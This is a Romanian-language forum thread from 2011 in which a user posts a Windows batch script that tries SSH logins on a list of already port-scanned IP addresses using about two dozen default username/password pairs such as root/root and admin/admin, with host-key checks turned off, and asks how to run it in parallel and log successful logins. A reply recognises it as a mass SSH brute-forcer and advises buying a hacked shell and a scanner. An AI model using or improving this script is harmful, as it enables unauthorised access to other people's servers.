rstfangg Posted December 12, 2011 Report Share Posted December 12, 2011 Salut la baieti!In primu rand keep up the good work!In al doilea rand am o problema si anume:Vreau sa rulez un client ssh (ssh.exe) pe o lista de ip-uri cu anumiti parametrii. Programul ar rula cam asa:ssh.exe -l username -p password 192.168.0.1Nu stiu nimic despre DOS / .BAT files ieri abia ce am petrecut vreo 5...6 ore pe google incercand sa-mi dau seama de unde sa incep si cu ce sa incep.O problema am rezolvat-o si anume faza cu "RSA key fingerprint" "Are you sure you want to continue connecting (yes/no)?" . Am gasit undeva o solutie, mai exact facand apel la optiunile -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no.Bun.Pana aici toate bune si frumoase am automatizat ceva cat de mic ... Insa mai departe e beleaua.Daca am sa spunem 100 de ip-uri in lista si fac ssh pe 10 usere per ip or sa mi se deschida (in versiunea mea .BAT) 1K de cmd.exe si calculatorul o sa o ia razna ca doar nu am vreun NEC cu 16 procesoare...Ok lasand gluma la o parte as dori sa stiu daca exista cineva care ma poate ajuta.As fi tare recunoscator.Mai jos este scriptul facut de mine.Mentionez ca e posibil sa fie aleasa o cale gresita inca de la inceputul scriptului dar repet nu stiu nimic despre .BAT / DOS , e un script facut in 5 ore pe google.@echo offfor /f %%a in (ip.txt) do ( ssh.exe -t -t -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no -l root -p root %%a ) for /f %%a in (ip.txt) do ( ssh.exe -t -t -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no -l admin -p admin %%a ) for /f %%a in (ip.txt) do ( ssh.exe -t -t -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no -l administrator -p administrator %%a ) for /f %%a in (ip.txt) do ( ssh.exe -t -t -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no -l webadmin -p webadmin %%a ) for /f %%a in (ip.txt) do ( ssh.exe -t -t -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no -l sysadmin -p sysadmin %%a ) for /f %%a in (ip.txt) do ( ssh.exe -t -t -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no -l netadmin -p netadmin %%a ) for /f %%a in (ip.txt) do ( ssh.exe -t -t -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no -l guest -p guest %%a ) for /f %%a in (ip.txt) do ( ssh.exe -t -t -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no -l test -p test %%a ) for /f %%a in (ip.txt) do ( ssh.exe -t -t -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no -l user -p user %%a ) for /f %%a in (ip.txt) do ( ssh.exe -t -t -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no -l ftp -p ftp %%a ) for /f %%a in (ip.txt) do ( ssh.exe -t -t -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no -l web -p web %%a ) for /f %%a in (ip.txt) do ( ssh.exe -t -t -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no -l ssh -p ssh %%a ) for /f %%a in (ip.txt) do ( ssh.exe -t -t -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no -l sftp -p sftp %%a ) for /f %%a in (ip.txt) do ( ssh.exe -t -t -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no -l oracle -p oracle %%a ) for /f %%a in (ip.txt) do ( ssh.exe -t -t -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no -l mssql -p mssql %%a ) for /f %%a in (ip.txt) do ( ssh.exe -t -t -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no -l nobody -p nobody %%a ) for /f %%a in (ip.txt) do ( ssh.exe -t -t -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no -l www -p www %%a )for /f %%a in (ip.txt) do ( ssh.exe -t -t -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no -l apache -p apache %%a )for /f %%a in (ip.txt) do ( ssh.exe -t -t -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no -l operator -p operator %%a ) for /f %%a in (ip.txt) do ( ssh.exe -t -t -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no -l bin -p bin %%a ) for /f %%a in (ip.txt) do ( ssh.exe -t -t -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no -l daemon -p daemon %%a ) for /f %%a in (ip.txt) do ( ssh.exe -t -t -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no -l backup -p backup %%a ) for /f %%a in (ip.txt) do ( ssh.exe -t -t -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no -l postfix -p postfix %%a ) for /f %%a in (ip.txt) do ( ssh.exe -t -t -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no -l sshd -p sshd %%a ) for /f %%a in (ip.txt) do ( ssh.exe -t -t -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no -l adm -p adm %%a ) for /f %%a in (ip.txt) do ( ssh.exe -t -t -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no -l student -p student %%a )Ce solutii vedeti ca fisieru .BAT sa parseze lista de ip-uri pe rand unul cate unul , sa execute ssh.exe cu optiunile de rigoare si sa faca si un log frumusel pe care sa-l pot verifica si in care sa caut ce imi convine si ceea ce astept defapt? Trebuie sa mai spun ca acest ssh.exe uneori se blocheaza deci scriptul .BAT va trebui sa stie sa treaca mai departe la urmatorul ip. Quote Link to comment Share on other sites More sharing options...
aelius Posted December 12, 2011 Report Share Posted December 12, 2011 Banuiesc ca tu defapt vrei sa-ti faci mass ssh scanner pe windows. In primul rand, asa cum spuneai si tu, daca un ip este down, "clientul" tau de ssh o sa astepte pana la timeout-ul definit "built-in" sau in config (daca are).Abordarea este proasta din mai multe considerente. - Clasele de adrese ip trebuiesc verificate cu un mass scanner, care face log cu ip-urile ce au port 22 deschis. - "Bruteforcerul" in sine trebuie sa deschida o gramada de socketi pentru a verifica adresele ip intr-un mod paralel. - "Clientul" ala de ssh are un timeout minim de o secunda (in mod sigur). Deci pentru a verifica un /24 ai nevoie de minim 254 secunde (sa adaug faptul ca nu incerci un singur utilizator per host ?)Cel mai bine, cumpara de la baieti un shell hacked, iei de pe packetstorm un mass scanner, iti faci o lista de utilizatori/parole si o arzi batraneste.daca si .bat-ul e programare, eu sunt mitropolitul olteniei. Quote Link to comment Share on other sites More sharing options...
rstfangg Posted December 12, 2011 Author Report Share Posted December 12, 2011 (edited) Iti multumesc pentru raspuns dar nu resursele sunt o problema...ideea e ca am nevoie exact de clientul "ala" sa il pot folosi exact cum am detaliat.Asta ar fi unu la mana.Doi la mana nu am mentionat nicaieri ca o sa astepte sau nu pana la time-out-ul built-in.Cred ca nu ai citit cu atentie postul meu.3 la mana am spus ca vreau sa parseze o lista de ip-uri nu ca vreau sa mi le si scaneze (.BAT-ul).Lista de ip-uri este deja scanata cu nmap, strobe, angry ip scanner or whatever... chiar nu are importanta ce folosesti.e un simplu port scan.O intrebare buna si la obiect este cum fac .BAT-ul sa deschida acei socketi pentru a verifica adresele ip intr-un mod paralel sa-i zicem pe nume multithread.Cat despre timpul de asteptare nu ma deranjeaza ca astept 1 secunda sau ca astept 254 de secunde ideea e sa automatizez tot procesul sa nu mai fie nevoie sa dau manual pe fiecare ip cu ssh.exe.Si dupa cum am zis, un logfile pe care sa-l pot parsa eu si sa-mi extrag ip-urile pe care a fost stabilita conexiunea(lucru deductibil cu ajutorul unui grep dupa ceva in genul "Microsoft Windows [Version"... nu ma pricep... ma gandesc si eu) ar fi bine venit.Cat despre blocarea programului aceasta se intampla doar cand conexiunea e stabilita.mai pe romaneste cand intra, ssh.exe ramane agatat de shell-ul windowsului.Cat despre ultimul rand tot ce pot sa spun este: nu fii rautacios....Din putinele mele cunostinte ma gandeam ca orice limbaj constituit din variabile, bucle si altele se poate numi un limbaj de programare.Si nu stiu de ce cand tastezi in google "batch prog" se autocompleteaza batch programming.Si mai sunt si 59.000.000 de rezultate pentru el ( Rezultatele 1 - 10 din aproximativ 59.000.000 pentru batch programming.).Anyway ... mersi pentru raspuns.edit:Nimeni nu ma poate ajuta ? Edited December 13, 2011 by wildchild fara double post-ing Quote Link to comment Share on other sites More sharing options...
rstfangg Posted December 14, 2011 Author Report Share Posted December 14, 2011 Gata, am rezolvat. VA MULTUMESC . lol. Quote Link to comment Share on other sites More sharing options...